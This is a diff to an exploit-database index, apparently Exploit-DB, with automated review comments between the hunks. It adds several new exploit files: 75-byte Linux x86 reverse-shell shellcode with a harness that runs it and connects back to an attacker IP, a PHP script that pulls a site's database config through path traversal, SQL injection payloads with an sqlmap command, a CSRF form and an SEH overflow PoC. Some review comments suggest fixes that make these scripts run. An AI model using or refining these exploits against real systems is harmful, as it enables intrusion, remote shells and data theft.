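Review bot: 39432 is changed only by appending "(1)" to its title, while the path (39432.c), author and date stay the same, and the entry it is meant to be distinguished from is not in this hunk. Confirm that a second "Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016)" entry exists and cite its id in the commit message before merging the suffix; otherwise leave the title unchanged.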
@ -35736,7 +35736,7 @@ id,file,description,date,author,platform,type,port
39512,platforms/windows/dos/39512.txt,"Viscomsoft Calendar Active-X 2.0 - Multiple Crash PoCs",2016-03-01,"Shantanu Khandelwal",windows,dos,0
39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 - Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
@ -35789,7 +35789,7 @@ id,file,description,date,author,platform,type,port
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
39572,platforms/php/webapps/39572.txt,"PivotX 2.3.11 - Directory Traversal",2016-03-17,"Curesec Research Team",php,webapps,80
39573,platforms/windows/webapps/39573.txt,"Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass",2016-03-20,"Tal Solomon of Palantir Security",windows,webapps,0
39574,platforms/windows/local/39574.cs,"Windows - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39575,platforms/php/webapps/39575.txt,"WordPress eBook Download Plugin 1.1 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39576,platforms/php/webapps/39576.txt,"WordPress Import CSV Plugin 1.0 - Directory Traversal",2016-03-21,Wadeek,php,webapps,80
39577,platforms/php/webapps/39577.txt,"WordPress Abtest Plugin - Local File Inclusion",2016-03-21,CrashBandicot,php,webapps,80
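Review bot: the 39574 rename adds an affected-version scope ("Microsoft Windows 8.1/10") that the old title did not carry, so this hunk adds information rather than only normalising punctuation as the other renames in this commit do. The commit message lists the new title but not where the 8.1/10 scope comes from; state the source (the exploit file's own header or the MS16-032 advisory) in the commit message, since the description field is what the index is searched on.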
@ -35810,7 +35810,7 @@ id,file,description,date,author,platform,type,port
39592,platforms/php/webapps/39592.txt,"WordPress Dharma booking Plugin 2.38.3 - File Inclusion Vulnerability",2016-03-22,AMAR^SHG,php,webapps,80
39593,platforms/php/webapps/39593.txt,"WordPress Memphis Document Library Plugin 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80
39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
39595,platforms/multiple/local/39595.txt,"OS X / iOS - Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
|
||||
39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0
|
||||
39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80
|
||||
39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80
|
||||
|
@ -35910,7 +35910,7 @@ id,file,description,date,author,platform,type,port
|
|||
39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
|
||||
39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
|
||||
39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80
|
||||
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
|
||||
39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
|
||||
39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
|
||||
39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80
|
||||
39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80
|
||||
|
@ -35940,7 +35940,7 @@ id,file,description,date,author,platform,type,port
|
|||
39738,platforms/multiple/webapps/39738.html,"EMC ViPR SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080
|
||||
39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0
|
||||
39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0
|
||||
39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
|
||||
39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0
|
||||
39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0
|
||||
39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0
|
||||
39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80
|
||||
|
@ -36047,7 +36047,7 @@ id,file,description,date,author,platform,type,port
39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443
39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80
39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0
39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088
39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443
39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0
39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80
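Review bot: the context lines 39851 ("Linux x86 TCP Bind Shell Port 4444 (656 bytes)") and 39853 ("Ubiquiti airOS Arbitrary File Upload") in this hunk still lack the " - " separator between product and title that the same hunk introduces for 39852 ("Oracle Application Testing Suite (ATS) - Arbitrary File Upload"); since the commit is normalising descriptions, rename them in the same pass, e.g. "Ubiquiti airOS - Arbitrary File Upload", so searchsploit output stays consistent.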
@ -36068,7 +36068,7 @@ id,file,description,date,author,platform,type,port
39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80
39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80
39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0
39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0
39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80
39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0
@ -36246,3 +36246,12 @@ id,file,description,date,author,platform,type,port
40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80
40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg logviewer.exe - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0
40075,platforms/lin_x86/shellcode/40075.c,"Linux x86 TCP Reverse Shellcode - 75 bytes",2016-07-08,sajith,lin_x86,shellcode,0
40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80
40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
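Review bot: the new entry 40070 misspells "Category" as "Catetory" in its description ("(Add Catetory) CSRF"); fix it before merging, since the description column is what searchsploit matches against. The context line 40067 ("Nagios XI Chained Remote Code Execution") also lacks the " - " separator that this commit adds to other entries, and 40075's description puts the size after the separator ("Linux x86 TCP Reverse Shellcode - 75 bytes") while 39851 puts it in parentheses ("(656 bytes)"); pick one form for shellcode entries.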
177
platforms/lin_x86/shellcode/40075.c
Executable file
@ -0,0 +1,177 @@
/*
# Linux x86 TCP Reverse Shellcode (75 bytes)
# Author: sajith
# Tested on: i686 GNU/Linux
# Shellcode Length: 75
# SLAE - 750

------------c prog ---poc by sajith shetty----------

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socket.h>
#include <netinet/in.h>

int main(void)

{

int sock_file_des;
struct sockaddr_in sock_ad;
//[1] create socket connection
//Man page: socket(int domain, int type, int protocol);
sock_file_des = socket(AF_INET, SOCK_STREAM, 0);


//[2]connect back to attacker machine (ip= 192.168.227.129)
//Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen);

sock_ad.sin_family = AF_INET;
sock_ad.sin_port = htons(4444);
sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
//[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2
//Man page: int dup2(int oldfd, int newfd);

dup2(sock_file_des, 0); // stdin
dup2(sock_file_des, 1); // stdout
dup2(sock_file_des, 2); // stderr

//[4]Execute shell (here we use /bin/sh) using execve call

//[*]Man page for execve call
//int execve(const char *filename, char *const argv[],char *const envp[]);

execve("/bin/sh", 0, 0);
}
----------------------end of c program--------------

global _start

section .text

_start:
;[1] create socket connection
;Man page: socket(int domain, int type, int protocol);
;sock_file_des = socket(2,1,0)

xor edx, edx
push 0x66 ; socket call(0x66)
pop eax
push edx ; protocol = 0
inc edx
push edx ; sock_stream = 1
mov ebx, edx ; EBX =1
inc edx
push edx ; AF_INET =2
mov ecx, esp ; save the pointer to args in ecx register
int 0x80 ; call socketcall()

; int dup2(int oldfd, int newfd);
mov ebx, eax ; store sock_file_des in ebx register
mov ecx, edx ; counter = 2
loop:
mov al, 0x3f
int 0x80
dec ecx
jns loop
; sock_ad.sin_family = AF_INET;
;sock_ad.sin_port = htons(4444);
;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad));
xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des
push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129");
push word 0x5C11 ; sock_ad.sin_port = htons(4444);
push word bx ; sock_ad.sin_family = AF_INET =2;
mov ecx, esp ; pointer to struct

mov al, 0x66 ; socket call (0x66)
inc ebx ; connect (3)
push 0x10 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push edx ; sock_file_des
mov ecx, esp ; save the pointer to args in ecx register
int 0x80

mov al, 11 ; execve system call
cdq ; overwriting edx with either 0 (if eax is positive)
push edx ; push null
push 0x68732f6e ; hs/b
push 0x69622f2f ; ib//
mov ebx,esp ; save pointer
push edx ; push null
push ebx ; push pointer
mov ecx,esp ; save pointer
int 0x80

-------------obj dump------------
rev_shell1: file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
8048060: 31 d2 xor edx,edx
8048062: 6a 66 push 0x66
8048064: 58 pop eax
8048065: 52 push edx
8048066: 42 inc edx
8048067: 52 push edx
8048068: 89 d3 mov ebx,edx
804806a: 42 inc edx
804806b: 52 push edx
804806c: 89 e1 mov ecx,esp
804806e: cd 80 int 0x80
8048070: 89 c3 mov ebx,eax
8048072: 89 d1 mov ecx,edx

08048074 <loop>:
8048074: b0 3f mov al,0x3f
8048076: cd 80 int 0x80
8048078: 49 dec ecx
8048079: 79 f9 jns 8048074 <loop>
804807b: 87 da xchg edx,ebx
804807d: 68 c0 a8 e3 81 push 0x81e3a8c0
8048082: 66 68 11 5c pushw 0x5c11
8048086: 66 53 push bx
8048088: 89 e1 mov ecx,esp
804808a: b0 66 mov al,0x66
804808c: 43 inc ebx
804808d: 6a 10 push 0x10
804808f: 51 push ecx
8048090: 52 push edx
8048091: 89 e1 mov ecx,esp
8048093: cd 80 int 0x80
8048095: b0 0b mov al,0xb
8048097: 99 cdq
8048098: 52 push edx
8048099: 68 6e 2f 73 68 push 0x68732f6e
804809e: 68 2f 2f 62 69 push 0x69622f2f
80480a3: 89 e3 mov ebx,esp
80480a5: 52 push edx
80480a6: 53 push ebx
80480a7: 89 e1 mov ecx,esp
80480a9: cd 80 int 0x80

-----------------------------------------------
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \

"\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68"
"\xc0\xa8\xe3\x81" //IP address 192.168.227.129
"\x66\x68"
"\x11\x5c" // port 4444
"\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80";


main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
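Review bot: the harness at the bottom declares `main()` with no return type and prints `strlen(code)` with `%d` although it returns `size_t`; use `int main(void)` and `%zu` so the file builds cleanly with the gcc line given in the header comment. In the reference C program, `<sys/socket.h>` is included twice and `inet_addr()` is used without `<arpa/inet.h>`. The comment on `cdq` ("overwriting edx with either 0 (if eax is positive)") is cut off mid-sentence; complete it, because the NULL that the next `push edx` relies on only appears when eax is non-negative after the preceding connect `int 0x80`, i.e. `mov al, 11` changes just the low byte and the rest of eax still holds connect's return value.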
30
platforms/php/webapps/40070.txt
Executable file
@ -0,0 +1,30 @@
######################
# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The Code for CSRF.html is

<html>
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>

#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
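Review bot: the header names /wp-content/plugins/lazy-content-slider/lzcs_admin.php as the vulnerable page, but the PoC form posts to admin.php?page=lazy-content-slider%2Flzcs.php; either say that both reach the same settings handler or correct one of them, otherwise the report cannot be matched against the plugin source. A fix section is also missing: the root cause for this class of WordPress plugin CSRF is a settings form saved without a nonce, and the standard remediation is to emit wp_nonce_field() in the form and call check_admin_referer() (plus a current_user_can() capability check) before processing the POST.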
35
platforms/php/webapps/40076.php
Executable file
@ -0,0 +1,35 @@
# Exploit Title: php Real Estate Script Arbitrary File Disclosure
# Date: 2016-07-08
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://www.realestatescript.eu/
# Version: v.3
# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip

Exploit :
<?php
//read db config file
$post_data = 'tpl=../../private/config/db.php';//change read file path
$host = "www.server.local";//change victim address
$socket = fsockopen($host, 80, $errno, $errstr, 15);
if(!$socket){
echo ' error: ' . $errno . ' ' . $errstr;
die;
}else{
//change [demo/en] path server
$path = "/demo/en/";
$http = "POST {$path}admin/ajax_cms/get_template_content/ HTTP/1.1\r\n";
$http .= "Host: $host\r\n";
$http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$http .= "Content-length: " . strlen($post_data) . "\r\n";
$http .= "Connection: close\r\n\r\n";
$http .= $post_data . "\r\n\r\n";
fwrite($socket, $http);
$contents = "";
while (!feof($socket)) {
$contents .= fgets($socket, 4096);
}
fclose($socket);
$e = explode('Content-Type: text/html',$contents);
print $e[1];
}
?>
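Review bot: `print $e[1]` at the end assumes the response body contains the literal string `Content-Type: text/html`; on any other response (error page, redirect, a different content type) explode() returns a single element and the script emits an undefined-offset notice instead of telling the user what happened, so check `count($e) > 1` (or split headers from body at the first blank line) first. The script also hard-codes port 80 in fsockopen() while the comments tell the user to change host and path, so a TLS-only site cannot be tested. More importantly for defenders, there is no vendor response, fix status or remediation: state the root cause (the `tpl` POST parameter of admin/ajax_cms/get_template_content/ is used as a file path without being confined to the template directory) so a patch can validate `tpl` against an allowlist of template names.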
55
platforms/php/webapps/40078.txt
Executable file
@ -0,0 +1,55 @@
######################
# Application Name : Streamo - Online Radio And Tv Streaming CMS

# Google Dork : inurl:rjdetails.php?id=

# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL

# Author Contact : https://twitter.com/byn4tural

# Vendor Homepage : http://rexbd.net/

# Vulnerable Type : SQL Injection

# Date : 2016-07-08

# Tested on : Windows 10 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0.6.28#dev

###################### SQL Injection Vulnerability ######################

# Location :
http://localhost/[path]/menu.php
http://localhost/[path]/programs.php
http://localhost/[path]/rjdetails.php

######################

# Vulnerable code :

$gid = $_GET["id"];


######################

# PoC Exploit:

http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x

# Exploit Code via sqlmap:

sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs

Parameter: id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY
---

######################
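Review bot: the "Vulnerable code" section quotes only `$gid = $_GET["id"];`, which is just the assignment; the line that interpolates `$gid` into the SQL string is the actual defect and should be shown so the finding is verifiable against the source, and it should be cited per affected file since three endpoints (menu.php, programs.php, rjdetails.php) are listed. No remediation is given either: `id` is numeric in every listed endpoint, so casting with `(int)$_GET["id"]` or, better, using a prepared statement with a bound parameter closes all three at once.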
99
platforms/windows/dos/40073.py
Executable file
@ -0,0 +1,99 @@
'''
[+] Credits: HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt
[+] ISR: ApparitionSec


Vendor:
=================
www.microsoft.com


Product:
=========================================
Microsoft Process Kill Utility "kill.exe"
File version: 6.3.9600.17298

The Kill tool (kill.exe), a tool used to terminate a process, part of the
WinDbg program.


Vulnerability Type:
===================
Buffer Overflow


SEH Buffer Overflow @ about 512 bytes


Vulnerability Details:
=====================

Register dump


'SEH chain of main thread
Address SE handler
001AF688 kernel32.756F489B
001AFBD8 52525252
42424242 *** CORRUPT ENTRY ***


001BF81C 41414141 AAAA
001BF820 41414141 AAAA
001BF824 41414141 AAAA
001BF828 41414141 AAAA
001BF82C 41414141 AAAA
001BF830 41414141 AAAA
001BF834 909006EB ë Pointer to next SEH record
001BF838 52525252 RRRR SE handler <================
001BF83C 90909090
001BF840 90909090


Exploit code(s):
================

Python POC.
'''

junk="A"*508+"RRRR"

pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe '
subprocess.Popen([pgm, junk], shell=False)


'''
Disclosure Timeline:
==================================
Vendor Notification: June 24, 2016
Vendor reply: Will not security service
July 8, 2016 : Public Disclosure


Exploitation Technique:
=======================
Local


Severity Level:
================
Low


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
'''
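Review bot: the script body never imports `subprocess`, so running it as written stops with a NameError before kill.exe is launched; add `import subprocess` above the `junk` line. "Vendor reply: Will not security service" in the timeline reads as a truncated sentence and should be completed. The "Vulnerability Type" section claims an SEH overwrite yet the severity is Low with no explanation; stating the reason (local only, the string is passed on the command line of a debugging tool running as the same user, so no privilege boundary is crossed) would make the rating defensible for readers doing triage.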
230
platforms/windows/dos/40074.txt
Executable file
@ -0,0 +1,230 @@
[+] Credits: HYP3RLINX

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec


Vendor:
=================
www.microsoft.com


Product:
====================
WinDbg logviewer.exe

LogViewer (logviewer.exe), a tool that displays the logs created, part of
WinDbg application.


Vulnerability Type:
===================
Buffer Overflow DOS


Vulnerability Details:
=====================

Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv
files. App crash then Overwrite of MMX registers etc...
this utility belongs to Windows Kits/8.1/Debuggers/x86

Read Access Violation / Memory Corruption
Win32 API Log Viewer
6.3.9600.17298
Windbg x86
logviewer.exe
Log Viewer 3.01 for x86


(5fb8.32fc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Windows\syswow64\msvcrt.dll -
eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000
edi=013dcd30
eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00210206
msvcrt!memmove+0x1ee:
754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi]
ds:002b:005d2000=????????????????????????????????

gs 2b
fs 53
es 2b
ds 2b
edi 136cd30
esi 7d2000
ebx 7d0000
edx 0
ecx 41
eax 136ad30
ebp df750
eip 754fa048
cs 23
efl 210206
esp df748
ss 2b
dr0 0
dr1 0
dr2 0
dr3 0
dr6 0
dr7 0
di cd30
si 2000
bx 0
dx 0
cx 41
ax ad30
bp f750
ip a048
fl 206
sp f748
bl 0
dl 0
cl 41
al 30
bh 0
dh 0
ch 0
ah ad
fpcw 27f
fpsw 4020
fptw ffff
fopcode 0
fpip 76454c1e
fpipsel 23
fpdp 6aec2c
fpdpsel 2b
st0 -1.00000000000000e+000
st1 -1.00000000000000e+000
st2 -1.00000000000000e+000
st3 9.60000000000000e+001
st4 1.08506945252884e-004
st5 -1.00000000000000e+000
st6 0.00000000000000e+000
st7 0.00000000000000e+000
mm0 0:2:2:2
mm1 0:0:2:202
mm2 0:1:1:1
mm3 c000:0:0:0
mm4 e38e:3900:0:0
mm5 0:0:0:0
mm6 0:0:0:0
mm7 0:0:0:0
mxcsr 1fa0
xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001
iopl 0
of 0
df 0
if 1
tf 0
sf 0
zf 0
af 0
pf 1
cf 0
vip 0
vif 0
xmm0l 4141:4141:4141:4141
xmm1l 4141:4141:4141:4141
xmm2l 4141:4141:4141:4141
xmm3l 4141:4141:4141:4141
xmm4l 4141:4141:4141:4141
xmm5l 4141:4141:4141:4141
xmm6l 4141:4141:4141:4141
xmm7l 4141:4141:4141:4141
xmm0h 4141:4141:4141:4141
xmm1h 4141:4141:4141:4141
xmm2h 4141:4141:4141:4141
xmm3h 4141:4141:4141:4141
xmm4h 4141:4141:4141:4141
xmm5h 4141:4141:4141:4141
xmm6h 4141:4141:4141:4141
xmm7h 4141:4141:4141:4141
xmm0/0 41414141
xmm0/1 41414141
xmm0/2 41414141
xmm0/3 41414141
xmm1/0 41414141
xmm1/1 41414141
xmm1/2 41414141
xmm1/3 41414141
xmm2/0 41414141
xmm2/1 41414141
xmm2/2 41414141
xmm2/3 41414141
xmm3/0 41414141
xmm3/1 41414141
xmm3/2 41414141
xmm3/3 41414141
xmm4/0 41414141
xmm4/1 41414141
xmm4/2 41414141
xmm4/3 41414141
xmm5/0 41414141
xmm5/1 41414141
xmm5/2 41414141
xmm5/3 41414141
xmm6/0 41414141
xmm6/1 41414141
xmm6/2 41414141
xmm6/3 41414141
xmm7/0 41414141
xmm7/1 41414141
xmm7/2 41414141
xmm7/3 41414141


Exploit code(s):
===============

1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM
registers, ECX etc
2) run from command line pipe the file to it to watch it crash and burn.

///////////////////////////////////////////////////////////////////////


Disclosure Timeline:
===============================
Vendor Notification: June 23, 2016
Vendor acknowledged: July 1, 2016
